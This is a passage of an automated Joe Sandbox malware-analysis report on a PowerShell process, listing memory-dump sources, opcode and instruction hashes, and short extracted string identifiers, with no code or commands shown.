                                                                                                • Instruction ID: a71b12c5221c9bdc87ff1c73035bec9b9d4b9a8a470490933ca1356a4e780c0c
                                                                                                • Opcode Fuzzy Hash: a262cb5ecc04eedf80251c199db338af8538b7927cd872319f71c298fa177fc5
                                                                                                • Instruction Fuzzy Hash: 824139F2B002169BDF24DB69D84026AB7E5EF84611B54C8AEC819DB340DA32D90487E2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (fwl$(fwl
                                                                                                • API String ID: 0-2797258600
                                                                                                • Opcode ID: 384eb3f1d784782bb7c88dc7006ecf0e8295d18a444b53c8461ee629f1b7fad9
                                                                                                • Instruction ID: 10d0d9cf6c201f381097a9604a7666cf1638d5d49370f0304a83f01d8bbdb147
                                                                                                • Opcode Fuzzy Hash: 384eb3f1d784782bb7c88dc7006ecf0e8295d18a444b53c8461ee629f1b7fad9
                                                                                                • Instruction Fuzzy Hash: D3223BB4B00215DFEB14CF58C551EAABBF2EB88315F25C0A9EA059B351CB72ED41CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q
                                                                                                • API String ID: 0-2697143702
                                                                                                • Opcode ID: 685765d1a6523d5c6ac4f3bdf97f692f984ab3cd5d33eab10d3db9f615931b76
                                                                                                • Instruction ID: bca9ee34d89777738a597230e6c4d94ac5835a29e4e2df2c57faeb6c3d472f8a
                                                                                                • Opcode Fuzzy Hash: 685765d1a6523d5c6ac4f3bdf97f692f984ab3cd5d33eab10d3db9f615931b76
                                                                                                • Instruction Fuzzy Hash: 80A1D8F1B002168FEB25DA6889126AABBA2EFC5311F14C4EED905CF651DB31DD41C7A2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q
                                                                                                • API String ID: 0-355816377
                                                                                                • Opcode ID: ea211c7168cdb4a749c8623554a981fdaaf734d7086f7bd2f82c5d1a15364192
                                                                                                • Instruction ID: d0fad29d7d06003837d122f130240d9f72b7f2e3671f533aa67464b65bf7d5ab
                                                                                                • Opcode Fuzzy Hash: ea211c7168cdb4a749c8623554a981fdaaf734d7086f7bd2f82c5d1a15364192
                                                                                                • Instruction Fuzzy Hash: 172136F6D002579BDB21CF69C84016ABBF4EF46610B98C5DEC858EB241E7309844C7E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: x.hk
                                                                                                • API String ID: 0-3394790906
                                                                                                • Opcode ID: d8bfe76c3d841c9e18d0383d95e0f4b7969826ad437252b5bbb3fa16e4f8d971
                                                                                                • Instruction ID: a7d3c3068e9943b817dc5ef6dd8030f376d55c56428a82b581853220fda81a6b
                                                                                                • Opcode Fuzzy Hash: d8bfe76c3d841c9e18d0383d95e0f4b7969826ad437252b5bbb3fa16e4f8d971
                                                                                                • Instruction Fuzzy Hash: 5031E5B4B40204AFD714DB68C915BEE7AE3AB84310F50C068EB056F3C1CF75AC468BA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 2d0bfe62e3dddf3388cae4c1b0cb8c85bf2b8bbd663ac9a9b394c152d0f71647
                                                                                                • Instruction ID: 732347e18508ee0dd17ff7d7f2ac8af6e1e72d499837849e265b3899a1aa9fcd
                                                                                                • Opcode Fuzzy Hash: 2d0bfe62e3dddf3388cae4c1b0cb8c85bf2b8bbd663ac9a9b394c152d0f71647
                                                                                                • Instruction Fuzzy Hash: D921B4F3B00206AFEF24CA248541779BAA3DB85640F58C0EDE900EB285EB75D94587A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cc046e2297c0c79c21b6333a0c3ef7ee788b4ea7de7b4861aacb0d5d7d1231f2
                                                                                                • Instruction ID: c1fba3e9404dba1fabe872ebbc275d90d01025babfb9e4e07ec3152f183b6982
                                                                                                • Opcode Fuzzy Hash: cc046e2297c0c79c21b6333a0c3ef7ee788b4ea7de7b4861aacb0d5d7d1231f2
                                                                                                • Instruction Fuzzy Hash: 44025BB4A00215EFDB14CF98C451EAABBB2EF84314F25C099EA059F391CB72ED45CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3c754e14b6a0af099a9c3b7d0836cf2bf85b4e42268b178075fc520bb5d511bf
                                                                                                • Instruction ID: ebc6eccdcfc3afbda5a8d05ef1ebdc4e40cac1532ff864962b1dcfcbae9fc7b0
                                                                                                • Opcode Fuzzy Hash: 3c754e14b6a0af099a9c3b7d0836cf2bf85b4e42268b178075fc520bb5d511bf
                                                                                                • Instruction Fuzzy Hash: 73D19FB0B002449FDB14CB98C551FA9BBB2EF89315F15C0A9EA099F391CB72ED45CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ca5bf05c28bfc6ed5214d44d7ca0089d66ef87560ee93e770b3bfe6fa3eb1714
                                                                                                • Instruction ID: f03c6e29f7e6b50a926ccf026db794f4bc2570ae2e2d44e3584be87454c170ef
                                                                                                • Opcode Fuzzy Hash: ca5bf05c28bfc6ed5214d44d7ca0089d66ef87560ee93e770b3bfe6fa3eb1714
                                                                                                • Instruction Fuzzy Hash: 7AC18C75A002489FCB14DFA5E544AADBBF2FF84310F118569E406AF365DB74AD8ACF80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c4ca64468e436cf46f914a63e7e84bdca58d8efdd66d98ea51082cc985be016
                                                                                                • Instruction ID: 659f0394f816abe11d054b53c939551e86748555f453c86948b4fc9aeb45c2c8
                                                                                                • Opcode Fuzzy Hash: 2c4ca64468e436cf46f914a63e7e84bdca58d8efdd66d98ea51082cc985be016
                                                                                                • Instruction Fuzzy Hash: 20D105B4A052489FCB55CFA8D584A9EBBF2BF48310F248569E805AB361C735ED81CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0992b7fea74f147e92e221c29ef428e726391b3857dcfa3573ad362def85f26
                                                                                                • Instruction ID: 15790ececa4b376878471f4825ae49a69de6b198469facb7ca18626a871a0d25
                                                                                                • Opcode Fuzzy Hash: a0992b7fea74f147e92e221c29ef428e726391b3857dcfa3573ad362def85f26
                                                                                                • Instruction Fuzzy Hash: E67135F5B00216DFDB20DA7989052BABBE2EF85311F14C4BED905DB680EB31D985C7A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a2cf6e9c2e26e48464fe0852218e79382ee875025d88f5dcad763660000d04b0
                                                                                                • Instruction ID: f1691c7c9d86789af19dff0a5c0be8eddb769347c992656bc9a588a53ce94a16
                                                                                                • Opcode Fuzzy Hash: a2cf6e9c2e26e48464fe0852218e79382ee875025d88f5dcad763660000d04b0
                                                                                                • Instruction Fuzzy Hash: C371AC70A002088FCB14DF69E884AAEBBF2FF89314F14C979D4159B751DB71AC46CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9d7176d66aabbe06998b1f574275678b60c29a1a94f7cd376b4643ffef73a4fc
                                                                                                • Instruction ID: 8eb6ed802fcb62c3c6346823f3e0534ed87288f0326cc80f077c6b258515c02d
                                                                                                • Opcode Fuzzy Hash: 9d7176d66aabbe06998b1f574275678b60c29a1a94f7cd376b4643ffef73a4fc
                                                                                                • Instruction Fuzzy Hash: 91715970A006089FDB18DFA4E484BADBBF2FF88304F148529D416AB354DB74AD4ACF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fd617fb47cd0565ba69e0d16e7960f961ec3925463fe5d776a106df065dae1a5
                                                                                                • Instruction ID: b5d6ec54fdca750c2c6cf217555cb6b25e59a0fc785d6eed885227090dac8d55
                                                                                                • Opcode Fuzzy Hash: fd617fb47cd0565ba69e0d16e7960f961ec3925463fe5d776a106df065dae1a5
                                                                                                • Instruction Fuzzy Hash: B951B335A103548FCB05DB38C4546AEBBF2AF89310F19C46AC545DF396CF749C468BA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2df83d9b358e7242c3ec3d3c61517c31117d9c190c6d529f396c4f869bf793b8
                                                                                                • Instruction ID: 6d9de73febf42b4ff0701dcf91587623367e5c0b4bed7da50d23aebcf97d8ba6
                                                                                                • Opcode Fuzzy Hash: 2df83d9b358e7242c3ec3d3c61517c31117d9c190c6d529f396c4f869bf793b8
                                                                                                • Instruction Fuzzy Hash: D141E7F1B042028FEB25CB68C9026E67BA2FF95650F14C4EEDA04DF261D735D945CBA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2499942e61bc028c9e711515bbce99b417839304e3085e03f891446576647b51
                                                                                                • Instruction ID: 87f8af5574f9f83dba9b92d5c4059e21d17eae8a6e202679661246f1843db1dd
                                                                                                • Opcode Fuzzy Hash: 2499942e61bc028c9e711515bbce99b417839304e3085e03f891446576647b51
                                                                                                • Instruction Fuzzy Hash: D6419C71A002408FDB15DB74E858AAE7BF6EF89750F048478E406EB7A1CB34AC42CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3bf4eb9e699c044ff78482d970242723d3a704685ffcac0ce9b3700543fa58b8
                                                                                                • Instruction ID: 56f2c0f7069118010752fd0dbb441a0127040071b5a40d5536f57d2e887ca2b2
                                                                                                • Opcode Fuzzy Hash: 3bf4eb9e699c044ff78482d970242723d3a704685ffcac0ce9b3700543fa58b8
                                                                                                • Instruction Fuzzy Hash: 50415F75A102048FDB08DF79D4947AEBAF7EF88311F14C469D909AB395CF759C828BA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2e2186d17ca2ab001b3465711ba334f50a2386364d247fd614adbd44875ae168
                                                                                                • Instruction ID: ce99d6354138979b24f6ba5a8c9faaa578ed97000e1012ae7ca1d14491a406b1
                                                                                                • Opcode Fuzzy Hash: 2e2186d17ca2ab001b3465711ba334f50a2386364d247fd614adbd44875ae168
                                                                                                • Instruction Fuzzy Hash: EF417BB0A002188FDB18DFA5E844BADBBF2FF89310F148539D005AB795DB74AC46CB80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5d784d7be1b7d547559034c40ba75e7e5bf81119fb2645b24a33727ff876ba59
                                                                                                • Instruction ID: fe19068a1d71b00bceb23374c8c972d7799a17b75249b46ea8ab017798c16b6c
                                                                                                • Opcode Fuzzy Hash: 5d784d7be1b7d547559034c40ba75e7e5bf81119fb2645b24a33727ff876ba59
                                                                                                • Instruction Fuzzy Hash: 364115B8A005069FCB09CF58D4949AEBBB1FF48314F1581A9D816AB265C336FC50CFA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 544e956b5be0df66d1845439fca71d6d76a32fb328fdedd723f28d420d48039b
                                                                                                • Instruction ID: 5f5aea62d4fc1cd8bc5d56dbfa5df3522f97c5d7bad25f1503f0694892b25012
                                                                                                • Opcode Fuzzy Hash: 544e956b5be0df66d1845439fca71d6d76a32fb328fdedd723f28d420d48039b
                                                                                                • Instruction Fuzzy Hash: 4A3182B5A093898FCB02CFA8D8509ADBFB1FF4A210B194196D454DB392D635EC45CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e85cc0f8debbad324a20953e918eb069f3f497f4f6b2f47b7e33cb0923196980
                                                                                                • Instruction ID: 5e58902317090cb0e4fa68db0299437ab26c350848f29ee15b417904d576f3ee
                                                                                                • Opcode Fuzzy Hash: e85cc0f8debbad324a20953e918eb069f3f497f4f6b2f47b7e33cb0923196980
                                                                                                • Instruction Fuzzy Hash: 1B21E5F5604202DFDF21DE2895127B9BFA1DF80350F5881BAD604CB291EB359980CBB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7376bfa4ca5df9ee1670f4528cd4d2c53d501125310405b1579bc28ab038967
                                                                                                • Instruction ID: 0a42c438b2f32fd701395dd3378df406b9ac8bac0d33f14e4943bad44e8e34e7
                                                                                                • Opcode Fuzzy Hash: b7376bfa4ca5df9ee1670f4528cd4d2c53d501125310405b1579bc28ab038967
                                                                                                • Instruction Fuzzy Hash: C12185B4A093899FCB01CFA8D8509ADBFB1FF4A310B15419AD445DB352C334EC45CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1985501836.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_32cd000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: faff808829ac15d8b734c23721f648a9e78d43ec092fb70aedb6cb99961ff9ed
                                                                                                • Instruction ID: 165da4b4102fb15dd61437b7fb4d36a872b97c09cca873809105a8bb9072e69d
                                                                                                • Opcode Fuzzy Hash: faff808829ac15d8b734c23721f648a9e78d43ec092fb70aedb6cb99961ff9ed
                                                                                                • Instruction Fuzzy Hash: 6B2127B5520280EFCF05CF14DAC4B26BFA6FB88314F24C69DEA094A257C336D496CB61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1985501836.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_32cd000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1985501836.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_32cd000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1985501836.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_32cd000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1986243555.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_5040000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$84ul$84ul$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                                                                                • API String ID: 0-1429631659
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$]$tP^q$tP^q$$^q$$^q$$^q$ml$ml
                                                                                                • API String ID: 0-2519749623
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$84ul$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3752238523
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$tP^q$$^q$$^q$$^q$ml$ml
                                                                                                • API String ID: 0-1096739536
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-100824264
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$84ul$tP^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-109380643
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$84ul$d%dq$d%dq$d%dq$tP^q
                                                                                                • API String ID: 0-2431970000
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.1996701655.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_7bc0000_powershell.jbxd